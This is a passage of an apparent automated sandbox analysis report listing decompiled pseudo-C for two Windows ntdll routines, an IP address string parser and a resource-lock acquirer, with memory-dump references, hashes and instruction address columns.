                                                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 0253E345
                                                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0253E2FB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BaseDataModuleQuery
                                                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                    • API String ID: 3901378454-484625025
                                                                                                                                                    • Opcode ID: 5edafa8acd0eabc46e1740c54f0675fbeedf8426e53b24df71f8ad363b620788
                                                                                                                                                    • Instruction ID: 654cc9ebc3547671ad85256474c1eae2d9acbc62c6fbfcf67f923bbd2877ee5e
                                                                                                                                                    • Opcode Fuzzy Hash: 5edafa8acd0eabc46e1740c54f0675fbeedf8426e53b24df71f8ad363b620788
                                                                                                                                                    • Instruction Fuzzy Hash: 7541D83168061D7AFF21DA94DC85FEBB3BDBF58705F0005AAA506E6080E770DA45CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02520B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E02520B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E024F8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E024EDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02520CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02520CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E025206BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E025206BA(_t135, _t178) == 0 || E02520A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02520CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02520CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E025206BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E025206BA(_t124, _t142) == 0 || E02520A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                    0x02520b21
                                                                                                                                                    0x02520b24
                                                                                                                                                    0x02520b27
                                                                                                                                                    0x02520b2a
                                                                                                                                                    0x02520b2d
                                                                                                                                                    0x02520b30
                                                                                                                                                    0x02520b33
                                                                                                                                                    0x02520b36
                                                                                                                                                    0x02520b39
                                                                                                                                                    0x02520b3e
                                                                                                                                                    0x02520c65
                                                                                                                                                    0x02520c68
                                                                                                                                                    0x02520c6a
                                                                                                                                                    0x02520c6f
                                                                                                                                                    0x0254eb42
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eb48
                                                                                                                                                    0x0254eb48
                                                                                                                                                    0x02520c75
                                                                                                                                                    0x02520c7a
                                                                                                                                                    0x0254eb54
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eb5a
                                                                                                                                                    0x02520c80
                                                                                                                                                    0x02520c84
                                                                                                                                                    0x0254eb98
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eba6
                                                                                                                                                    0x02520cb8
                                                                                                                                                    0x02520cba
                                                                                                                                                    0x02520cd3
                                                                                                                                                    0x02520cda
                                                                                                                                                    0x02520ce4
                                                                                                                                                    0x02520ce9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520cec
                                                                                                                                                    0x02520c8c
                                                                                                                                                    0x0254eb63
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eb70
                                                                                                                                                    0x0254eb75
                                                                                                                                                    0x0254eb7d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eb8c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eb8c
                                                                                                                                                    0x02520c96
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520ca2
                                                                                                                                                    0x02520cac
                                                                                                                                                    0x02520cb4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520b44
                                                                                                                                                    0x02520b47
                                                                                                                                                    0x02520b49
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520b4f
                                                                                                                                                    0x02520b50
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520b56
                                                                                                                                                    0x02520b62
                                                                                                                                                    0x02520b7c
                                                                                                                                                    0x02520bac
                                                                                                                                                    0x02520a0f
                                                                                                                                                    0x0254eaaa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eac4
                                                                                                                                                    0x0254eac4
                                                                                                                                                    0x02520bd0
                                                                                                                                                    0x02520bd0
                                                                                                                                                    0x02520bd4
                                                                                                                                                    0x02520bd9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520bdb
                                                                                                                                                    0x02520be0
                                                                                                                                                    0x0254eb0e
                                                                                                                                                    0x02520a1a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520a1a
                                                                                                                                                    0x0254eb1a
                                                                                                                                                    0x0254eb1f
                                                                                                                                                    0x0254eb27
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eb36
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eb36
                                                                                                                                                    0x02520bea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520bf6
                                                                                                                                                    0x02520c00
                                                                                                                                                    0x02520c03
                                                                                                                                                    0x02520c0b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520c0b
                                                                                                                                                    0x0254eaaa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520a15
                                                                                                                                                    0x02520bb6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520bc6
                                                                                                                                                    0x02520bc6
                                                                                                                                                    0x02520bcb
                                                                                                                                                    0x02520c15
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520c1d
                                                                                                                                                    0x02520c20
                                                                                                                                                    0x02520c21
                                                                                                                                                    0x02520c24
                                                                                                                                                    0x02520c24
                                                                                                                                                    0x02520c26
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520c26
                                                                                                                                                    0x02520bcd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520bcd
                                                                                                                                                    0x02520b89
                                                                                                                                                    0x02520b89
                                                                                                                                                    0x02520b90
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520b96
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520b96
                                                                                                                                                    0x02520a04
                                                                                                                                                    0x02520a04
                                                                                                                                                    0x02520b9a
                                                                                                                                                    0x02520b9a
                                                                                                                                                    0x02520b9b
                                                                                                                                                    0x02520b9f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520ba5
                                                                                                                                                    0x02520ac7
                                                                                                                                                    0x02520aca
                                                                                                                                                    0x0254eacf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eade
                                                                                                                                                    0x0254eade
                                                                                                                                                    0x0254eae3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eaf3
                                                                                                                                                    0x0254eaf6
                                                                                                                                                    0x0254eaf7
                                                                                                                                                    0x0254eafe
                                                                                                                                                    0x0254eb01
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eb01
                                                                                                                                                    0x0254eacf
                                                                                                                                                    0x02520ad0
                                                                                                                                                    0x02520ad4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520ada
                                                                                                                                                    0x02520ae6
                                                                                                                                                    0x02520c34
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520c47
                                                                                                                                                    0x02520c49
                                                                                                                                                    0x02520c4a
                                                                                                                                                    0x02520c4e
                                                                                                                                                    0x02520c51
                                                                                                                                                    0x02520c54
                                                                                                                                                    0x02520c57
                                                                                                                                                    0x02520c5a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520c60
                                                                                                                                                    0x02520afb
                                                                                                                                                    0x02520afe
                                                                                                                                                    0x02520b02
                                                                                                                                                    0x02520b05
                                                                                                                                                    0x02520b08
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520b08
                                                                                                                                                    0x02520ae6
                                                                                                                                                    0x02520b44
                                                                                                                                                    0x025209f8
                                                                                                                                                    0x025209f8
                                                                                                                                                    0x025209f9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eaa0
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fassign
                                                                                                                                                    • String ID: .$:$:
                                                                                                                                                    • API String ID: 3965848254-2308638275
                                                                                                                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                    • Instruction ID: 68f2d68548699b0d1c3c004f032fe04e55769f15c8b687c6201ba3fe28af6288
                                                                                                                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                    • Instruction Fuzzy Hash: 4AA180B190222ADFCF24CF54C8446BEFBB9BB66308F24846AD442B72C0D734964DCB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02520554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 49%
                                                                                                                                                    			E02520554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x025c01c0;
									_push(_t144);
									_push(0);
									_t51 = E024DF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02524FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02533F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02533F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0256217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02533F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02523915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x025c01c0;
												_push(_t138);
												_push(0);
												_t58 = E024DF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02524FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02533F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02533F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0256217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02533F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02523915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02505384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E024DF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02523915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E024DF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02523915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E024DF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02523915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E02505329(_t110, _t138);
																return E025053A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                                                                                                                                    0x0252055a
                                                                                                                                                    0x0252055d
                                                                                                                                                    0x02520563
                                                                                                                                                    0x02520566
                                                                                                                                                    0x025205d8
                                                                                                                                                    0x025205e2
                                                                                                                                                    0x025205e5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025205e7
                                                                                                                                                    0x025205e7
                                                                                                                                                    0x025205ea
                                                                                                                                                    0x025205f3
                                                                                                                                                    0x025205f3
                                                                                                                                                    0x02520568
                                                                                                                                                    0x02520568
                                                                                                                                                    0x02520568
                                                                                                                                                    0x02520569
                                                                                                                                                    0x02520569
                                                                                                                                                    0x02520569
                                                                                                                                                    0x0252056b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254217f
                                                                                                                                                    0x02542183
                                                                                                                                                    0x0254225b
                                                                                                                                                    0x0254225f
                                                                                                                                                    0x02542189
                                                                                                                                                    0x0254218c
                                                                                                                                                    0x0254218f
                                                                                                                                                    0x02542194
                                                                                                                                                    0x02542199
                                                                                                                                                    0x0254219d
                                                                                                                                                    0x025421a0
                                                                                                                                                    0x025421a2
                                                                                                                                                    0x025421ce
                                                                                                                                                    0x025421ce
                                                                                                                                                    0x025421ce
                                                                                                                                                    0x025421d0
                                                                                                                                                    0x025421d6
                                                                                                                                                    0x025421de
                                                                                                                                                    0x025421e2
                                                                                                                                                    0x025421e8
                                                                                                                                                    0x025421e9
                                                                                                                                                    0x025421ec
                                                                                                                                                    0x025421f1
                                                                                                                                                    0x025421f6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025421f8
                                                                                                                                                    0x025421fb
                                                                                                                                                    0x02542206
                                                                                                                                                    0x0254220b
                                                                                                                                                    0x0254220c
                                                                                                                                                    0x02542217
                                                                                                                                                    0x02542226
                                                                                                                                                    0x0254222b
                                                                                                                                                    0x0254222c
                                                                                                                                                    0x0254222f
                                                                                                                                                    0x02542232
                                                                                                                                                    0x02542235
                                                                                                                                                    0x02542235
                                                                                                                                                    0x0254223a
                                                                                                                                                    0x0254223f
                                                                                                                                                    0x02542241
                                                                                                                                                    0x02542243
                                                                                                                                                    0x02542248
                                                                                                                                                    0x02542248
                                                                                                                                                    0x0254224d
                                                                                                                                                    0x0254224f
                                                                                                                                                    0x02542262
                                                                                                                                                    0x02542263
                                                                                                                                                    0x02542268
                                                                                                                                                    0x02542269
                                                                                                                                                    0x02542269
                                                                                                                                                    0x02542269
                                                                                                                                                    0x0254226d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02542276
                                                                                                                                                    0x02542279
                                                                                                                                                    0x0254227e
                                                                                                                                                    0x02542283
                                                                                                                                                    0x02542287
                                                                                                                                                    0x0254228a
                                                                                                                                                    0x0254228d
                                                                                                                                                    0x0254228f
                                                                                                                                                    0x025422bc
                                                                                                                                                    0x025422bc
                                                                                                                                                    0x025422bc
                                                                                                                                                    0x025422be
                                                                                                                                                    0x025422c4
                                                                                                                                                    0x025422cc
                                                                                                                                                    0x025422d0
                                                                                                                                                    0x025422d6
                                                                                                                                                    0x025422d7
                                                                                                                                                    0x025422da
                                                                                                                                                    0x025422df
                                                                                                                                                    0x025422e4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025422e6
                                                                                                                                                    0x025422e9
                                                                                                                                                    0x025422f4
                                                                                                                                                    0x025422f9
                                                                                                                                                    0x025422fa
                                                                                                                                                    0x02542305
                                                                                                                                                    0x02542314
                                                                                                                                                    0x02542319
                                                                                                                                                    0x0254231a
                                                                                                                                                    0x0254231d
                                                                                                                                                    0x02542320
                                                                                                                                                    0x02542323
                                                                                                                                                    0x02542323
                                                                                                                                                    0x02542328
                                                                                                                                                    0x0254232d
                                                                                                                                                    0x0254232f
                                                                                                                                                    0x02542331
                                                                                                                                                    0x02542336
                                                                                                                                                    0x02542336
                                                                                                                                                    0x0254233b
                                                                                                                                                    0x0254233d
                                                                                                                                                    0x02542350
                                                                                                                                                    0x02542351
                                                                                                                                                    0x02542356
                                                                                                                                                    0x02542359
                                                                                                                                                    0x02542359
                                                                                                                                                    0x0254235b
                                                                                                                                                    0x0254235d
                                                                                                                                                    0x02505367
                                                                                                                                                    0x0250536b
                                                                                                                                                    0x02505372
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02542363
                                                                                                                                                    0x02542363
                                                                                                                                                    0x02542369
                                                                                                                                                    0x0254236a
                                                                                                                                                    0x0254236c
                                                                                                                                                    0x02542371
                                                                                                                                                    0x02542373
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02542379
                                                                                                                                                    0x02542379
                                                                                                                                                    0x0254237a
                                                                                                                                                    0x0254237f
                                                                                                                                                    0x0254237f
                                                                                                                                                    0x02542385
                                                                                                                                                    0x02542386
                                                                                                                                                    0x02542389
                                                                                                                                                    0x0254238e
                                                                                                                                                    0x02542390
                                                                                                                                                    0x02505378
                                                                                                                                                    0x0250537c
                                                                                                                                                    0x02542396
                                                                                                                                                    0x02542396
                                                                                                                                                    0x02542397
                                                                                                                                                    0x0254239c
                                                                                                                                                    0x025423a2
                                                                                                                                                    0x025423a3
                                                                                                                                                    0x025423a6
                                                                                                                                                    0x025423ab
                                                                                                                                                    0x025423ad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025423b3
                                                                                                                                                    0x025423b3
                                                                                                                                                    0x025423b4
                                                                                                                                                    0x025423b9
                                                                                                                                                    0x025423ba
                                                                                                                                                    0x025423ba
                                                                                                                                                    0x025423bc
                                                                                                                                                    0x025423bf
                                                                                                                                                    0x00000000
